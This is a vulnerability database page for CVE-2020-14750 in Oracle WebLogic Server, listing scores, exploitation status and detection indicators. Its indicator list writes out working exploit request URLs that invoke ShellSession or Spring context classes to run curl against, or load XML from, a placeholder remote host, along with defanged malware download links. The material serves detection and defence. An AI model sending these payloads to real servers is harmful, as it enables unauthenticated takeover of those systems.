cbcvebase.
CVE-2020-14750
published 2020-11-02

CVE-2020-14750: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.27%
99.9th percentile
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Affected

10 ranges
VendorProductVersion rangeFixed in
oracleweblogic_server
oracleweblogic_server
oracleweblogic_server
oracleweblogic_server
oracleweblogic_server
oracle_corporationweblogic_server
oracle_corporationweblogic_server
oracle_corporationweblogic_server
oracle_corporationweblogic_server
oracle_corporationweblogic_server

Detection & IOCsextracted from sources · hover to see the quote

urlGET /console/images/%252E%252E%252Fconsole.portal
urlGET /console/css/%252e%252e%252fconsole.portal
urlGET /console/..%2Fconsole.portal
urlGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession (%22java.lang.Runtime.getRuntime(). exec (" curl http://x.x.x.x:1234 ");")
urlGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext(" http://x.x.x.x:32531/poc.xml
urlGET /console/images/%252E%252E%252Fconsole.portal?handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22 http://x.x.x.x %22)
hash2b03806939d1171f063ba8d14c3b10622edb5732e4f78dc4fe3eac98b56e5d46
hash55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3
hash57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414
hash9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765
hashbb86dcfb6bca5fba8ab92d7a4ded9599baab400804c5fe5fb37aaef75f15e0ac
hash938804d619e2c7d2e3c31f1479574cbb8c85db14d3b5f0c70ccc22d4599f4ff7
hash61879d5b2f083b69e8e6cc6afce00be6619176151b093de14f2778a87ea46565
hash6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
hashdd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839
hash0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049
hash3dbcd99edb3422b8fdc458b82aa7ecfe31296d32bb4d54450c9e9cac29fb6141
hasha254a26a27e36de4d96b6023f2dc8a82c4c4160a1d72b822f34ffdd5e9a0e0c9
urlhxxp://188[.]166[.]137[.]241/wp-content/themes/twentyseventeen/dk86
urlhxxp://153[.]121[.]58[.]102:80/wp-content/themes/zuki/m8
urlhxxp://3[.]10.224[.]87/[.]a/dk86
urlhxxp://194[.]38[.]20[.]199/wb.sh
urlhxxp://194[.]38[.]20[.]199/kinsing
pathC:\Windows\Temp\7fde\wget.bin
pathC:\Windows\Temp\7fde\7z.bin
filenamekdevtmpfsi
filenamebc.pl
  • Monitor for WebLogic Java process spawning bash shells, indicative of post-exploitation activity following CVE-2020-14750 exploitation
  • Detect ShellSession or ClassPathXmlApplicationContext/FileSystemXmlApplicationContext handle parameters in WebLogic console HTTP requests as RCE exploitation indicators
  • Apply IPS rule 1010590 (Oracle WebLogic Server RCE vulnerabilities CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883) to detect and block exploitation traffic
  • Detect cronjob creation downloading wb.sh as a persistence mechanism following WebLogic exploitation
  • On Windows post-exploitation, look for PROPHET SPIDER staging tools wget.bin and 7z.bin under C:\Windows\Temp\7fde\
  • ·The exploit URL patterns use placeholder IPs (x.x.x.x) in the sourced documents; actual attacker-controlled IPs must be substituted in real-world detections
  • ·CVE-2020-14750 is closely related to CVE-2020-14882 and CVE-2020-14883; IPS rules and IOCs from campaigns often cover all three vulnerabilities together and may not be exclusively attributable to CVE-2020-14750 alone
  • ·The /tmp/zzza flag file can be manually created to prevent Kinsing wb.sh from executing further infection steps, but this is a temporary mitigation and not a substitute for patching

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.